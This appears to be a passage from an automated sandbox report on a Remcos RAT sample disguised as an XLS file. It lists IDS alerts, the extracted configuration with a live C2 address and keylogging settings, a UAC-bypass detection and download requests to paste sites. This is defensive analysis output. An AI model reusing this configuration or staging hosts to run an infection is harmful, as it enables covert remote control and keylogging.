                    2024-10-03T09:28:37.263282+020020327761Malware Command and Control Activity Detected192.168.2.649733212.162.149.1632404TCP
                    2024-10-03T09:28:39.737467+020020327761Malware Command and Control Activity Detected192.168.2.649734212.162.149.1632404TCP
                    2024-10-03T09:28:42.259851+020020327761Malware Command and Control Activity Detected192.168.2.649735212.162.149.1632404TCP
                    2024-10-03T09:28:44.783981+020020327761Malware Command and Control Activity Detected192.168.2.649736212.162.149.1632404TCP
                    2024-10-03T09:28:47.323437+020020327761Malware Command and Control Activity Detected192.168.2.649737212.162.149.1632404TCP
                    2024-10-03T09:28:49.811942+020020327761Malware Command and Control Activity Detected192.168.2.649739212.162.149.1632404TCP
                    2024-10-03T09:28:52.327187+020020327761Malware Command and Control Activity Detected192.168.2.649740212.162.149.1632404TCP
                    2024-10-03T09:28:54.811710+020020327761Malware Command and Control Activity Detected192.168.2.649741212.162.149.1632404TCP
                    2024-10-03T09:28:57.327488+020020327761Malware Command and Control Activity Detected192.168.2.649743212.162.149.1632404TCP
                    2024-10-03T09:28:59.820733+020020327761Malware Command and Control Activity Detected192.168.2.649744212.162.149.1632404TCP
                    2024-10-03T09:29:02.359457+020020327761Malware Command and Control Activity Detected192.168.2.649745212.162.149.1632404TCP
                    2024-10-03T09:29:05.060314+020020327761Malware Command and Control Activity Detected192.168.2.649746212.162.149.1632404TCP
                    2024-10-03T09:29:07.515008+020020327761Malware Command and Control Activity Detected192.168.2.649747212.162.149.1632404TCP
                    2024-10-03T09:29:10.000254+020020327761Malware Command and Control Activity Detected192.168.2.649748212.162.149.1632404TCP
                    2024-10-03T09:29:12.471874+020020327761Malware Command and Control Activity Detected192.168.2.649749212.162.149.1632404TCP
                    2024-10-03T09:29:14.936735+020020327761Malware Command and Control Activity Detected192.168.2.649750212.162.149.1632404TCP
                    2024-10-03T09:29:17.407502+020020327761Malware Command and Control Activity Detected192.168.2.649751212.162.149.1632404TCP
                    2024-10-03T09:29:20.092592+020020327761Malware Command and Control Activity Detected192.168.2.649753212.162.149.1632404TCP
                    2024-10-03T09:29:22.827305+020020327761Malware Command and Control Activity Detected192.168.2.649754212.162.149.1632404TCP
                    2024-10-03T09:29:25.344002+020020327761Malware Command and Control Activity Detected192.168.2.649755212.162.149.1632404TCP
                    2024-10-03T09:29:27.843037+020020327761Malware Command and Control Activity Detected192.168.2.649756212.162.149.1632404TCP
                    2024-10-03T09:29:30.326918+020020327761Malware Command and Control Activity Detected192.168.2.649757212.162.149.1632404TCP
                    2024-10-03T09:29:32.828638+020020327761Malware Command and Control Activity Detected192.168.2.649758212.162.149.1632404TCP
                    2024-10-03T09:29:35.280034+020020327761Malware Command and Control Activity Detected192.168.2.649759212.162.149.1632404TCP
                    2024-10-03T09:29:37.799854+020020327761Malware Command and Control Activity Detected192.168.2.649760212.162.149.1632404TCP
                    2024-10-03T09:29:40.301582+020020327761Malware Command and Control Activity Detected192.168.2.649761212.162.149.1632404TCP
                    2024-10-03T09:29:42.814455+020020327761Malware Command and Control Activity Detected192.168.2.649762212.162.149.1632404TCP
                    2024-10-03T09:29:45.358366+020020327761Malware Command and Control Activity Detected192.168.2.649763212.162.149.1632404TCP
                    2024-10-03T09:29:47.811790+020020327761Malware Command and Control Activity Detected192.168.2.649764212.162.149.1632404TCP
                    2024-10-03T09:29:50.284883+020020327761Malware Command and Control Activity Detected192.168.2.649765212.162.149.1632404TCP
                    2024-10-03T09:29:52.720677+020020327761Malware Command and Control Activity Detected192.168.2.649766212.162.149.1632404TCP
                    2024-10-03T09:29:55.092566+020020327761Malware Command and Control Activity Detected192.168.2.649767212.162.149.1632404TCP
                    2024-10-03T09:29:57.420650+020020327761Malware Command and Control Activity Detected192.168.2.649769212.162.149.1632404TCP
                    2024-10-03T09:29:59.923538+020020327761Malware Command and Control Activity Detected192.168.2.649770212.162.149.1632404TCP
                    2024-10-03T09:30:02.330484+020020327761Malware Command and Control Activity Detected192.168.2.649771212.162.149.1632404TCP
                    2024-10-03T09:30:04.608519+020020327761Malware Command and Control Activity Detected192.168.2.649772212.162.149.1632404TCP
                    2024-10-03T09:30:06.843533+020020327761Malware Command and Control Activity Detected192.168.2.649773212.162.149.1632404TCP
                    2024-10-03T09:30:09.080687+020020327761Malware Command and Control Activity Detected192.168.2.649774212.162.149.1632404TCP
                    2024-10-03T09:30:09.446203+020020327761Malware Command and Control Activity Detected192.168.2.649774212.162.149.1632404TCP
                    2024-10-03T09:30:12.762607+020020327761Malware Command and Control Activity Detected192.168.2.649775212.162.149.1632404TCP
                    2024-10-03T09:30:15.640291+020020327761Malware Command and Control Activity Detected192.168.2.649776212.162.149.1632404TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-03T09:28:18.472783+020028033053Unknown Traffic192.168.2.649717188.114.97.3443TCP
                    2024-10-03T09:28:22.004816+020028033053Unknown Traffic192.168.2.649722188.114.97.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-03T09:28:12.500205+020028410751Malware Command and Control Activity Detected192.168.2.649713188.114.97.3443TCP
                    2024-10-03T09:28:18.472783+020028410751Malware Command and Control Activity Detected192.168.2.649717188.114.97.3443TCP
                    2024-10-03T09:28:22.004816+020028410751Malware Command and Control Activity Detected192.168.2.649722188.114.97.3443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "212.162.149.163:2404:0", "Assigned name": "NedDay", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-52K54M", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Multi AV Scanner detection for domain / URL
                    Source: desckvbrat.com.brVirustotal: Detection: 7%Perma Link
                    Source: ftp.desckvbrat.com.brVirustotal: Detection: 8%Perma Link
                    Source: http://ftp.desckvbrat.com.brVirustotal: Detection: 8%Perma Link
                    Source: http://desckvbrat.com.brVirustotal: Detection: 7%Perma Link
                    Source: https://pastebin.com/raw/pQQ0n3eAVirustotal: Detection: 5%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: SKMBT_77122012816310TD0128_17311_XLS.vbsVirustotal: Detection: 9%Perma Link
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\1210\logs.dat, type: DROPPED
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,20_2_004338C8
                    Source: powershell.exe, 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_ea886d74-4

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00407538 _wcslen,CoGetObject,20_2_00407538
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 173.231.247.100:443 -> 192.168.2.6:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49724 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49732 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,20_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,20_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,20_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00407877 FindFirstFileW,FindNextFileW,20_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044E8F9 FindFirstFileExA,20_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,20_2_00407CD2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

                    Software Vulnerabilities

                    barindex
                    Suspicious execution chain found
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49726 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49730 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49734 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49736 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49725 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49735 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49743 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49744 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49746 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49729 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49754 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49745 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49747 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49766 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49772 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49760 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49751 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49767 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49741 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49770 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49737 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49756 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49763 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49739 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49775 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49771 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49762 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49758 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49750 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49759 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49757 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49748 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49740 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49773 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49755 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49776 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49769 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49753 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49764 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49774 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49731 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49749 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49733 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49761 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49765 -> 212.162.149.163:2404
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49713 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49717 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49722 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 173.231.247.100:443 -> 192.168.2.6:49719
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 173.231.247.100:443 -> 192.168.2.6:49719
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 212.162.149.163
                    Connects to a pastebin service (likely for C&C)
                    Source: unknownDNS query: name: paste.ee
                    Source: unknownDNS query: name: pastebin.com
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 191.252.83.213 ports 60509,1,2,60575,60261,21
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 4.2.powershell.exe.1bdb03863b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.powershell.exe.1bdb17aa240.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.powershell.exe.199619d7e98.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.6:49712 -> 191.252.83.213:60575
                    Source: global trafficTCP traffic: 192.168.2.6:49725 -> 212.162.149.163:2404
                    Source: global trafficHTTP traffic detected: GET /d/RdlsG/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/b5xuX/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /wp-includes/customize/css/bd.txt HTTP/1.1Host: www.gratitudeseekers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/Ga0HE/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                    Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49717 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49722 -> 188.114.97.3:443
                    Source: unknownFTP traffic detected: 191.252.83.213:21 -> 192.168.2.6:49711 220 "Servico de FTP da Locaweb"
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.163
